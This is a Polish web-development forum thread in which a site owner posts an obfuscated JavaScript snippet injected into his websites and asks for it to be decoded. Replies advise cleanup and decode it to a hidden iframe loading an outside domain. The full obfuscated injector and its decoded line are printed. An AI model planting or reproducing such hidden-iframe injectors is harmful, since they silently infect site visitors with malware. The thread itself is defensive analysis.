rozszyfrowanie kodu Opcje

[karis]

czesc

bardzo was prosze pomozcie mi rozszyforwac ten kod, bo ktos go wstrzyknal na moje serwisy internetowe i to jest wirus tzn sciaga sie wirus i teraz ktos moim kompoem zarzadza i wysyla jakies informacje na gg innym

Kod

<!-- ad --><script>
  uyimh=687;
  qxcxg=4804;
  ddytx=7948;
  xkjpv="write";
  mzsrv="me";
  zqfqw="et";
  gdtrk="/' st";
  rpiia="yl";
  qxaol="";
  ldlvw="i";
  zfhuu="ty";
  hvkhb=":h";
  hbqmm="d";
  hauzn="";
  zdqdp=4;
  sjgbi="if";
  rpygo="r";
  syjnh=" sr";
  rwanv="c";
  elujl="=";
  hrgnc=863;
  akzpp=8853;
  tplxn=" ";
  cvtot="</";
  qtndm="";
  jlooz=3953;
  uyimh=687;
  qxcxg=4804;
  ddytx=7948;
  xkjpv="write";
  mzsrv="me";
  zqfqw="et";
  gdtrk="/' st";
  rpiia="yl";
  qxaol="";
  ldlvw="i";
  zfhuu="ty";
  hvkhb=":h";
  hbqmm="d";
  hauzn="";
  zdqdp=4;
  sjgbi="if";
  rpygo="r";
  syjnh=" sr";
  rwanv="c";
  elujl="=";
  hrgnc=863;
  akzpp=8853;
  tplxn=" ";
  cvtot="</";
  qtndm="";
  jlooz=3953;
  gftzo=(9.007e3>=5e1?uyimh:qxcxg);
  jjaqh=(ddytx>.2438?xkjpv:3.);
  gmbpt=(7.3e1>=36?mzsrv:.45);
  zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
  hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
  rmtyf=(6.5e1,"");
  
  aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>":64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad --></BODY></HTML>
  <script type="text/javascript"><!--

Ten post edytował karis 1.03.2009, 19:37:58

[Foxx]

Usuń dodany kod z plików, zmień hasła na kontach, nie wprowadzaj ich do total commandera i innych managerów ftp, przeskanuj komputer. Wirus to chyba VBS:Malware-gen.

[karis]

a moze mi ktos ten kod rozszyfroac bo chce wiedziec co dokladnie sie tam robi

[tommy4]

A skąd my mamy mieć pewność, że to nie Ty napisałeś 'wirusa' i przypadkiem nie chcesz, żebyśmy odpalili skrypt powyżej? (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

[karis]

pewnosci nie macie zadnej chce jedynie abyscie pomogli mi go rozszyfrowac nie musicie nic odpalac chce znac adres strony z ktora sie laczy

[erix]

Z tego, co po kodzie widać, to podałeś tylko pierwszą część, czyli zakodowany skrypt. Ale dekodera tu nie widzę. (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

[karis]

probowalem sobie w edytorze za pomoca funkcji fin&replace i rozszyfrowalem tylko pokazanie diva natomiast adresu nie do konca rozszyforwalem

[l0ud]

Kod

<iframe src="http://truittbros.net/" style="visibility: hidden;"></iframe>

[Kocurro]

A na przyszłość polecam korzystanie z Firebug'a - nie traciłbyś czasu na pisanie posta na forum...

[Orkan]

Kod

<iframe src="http://truittbros.net/" style="visibility: hidden;"></iframe>

a kto zjadl document.write() ? (IMG:http://forum.php.pl/style_emoticons/default/czarodziej.gif)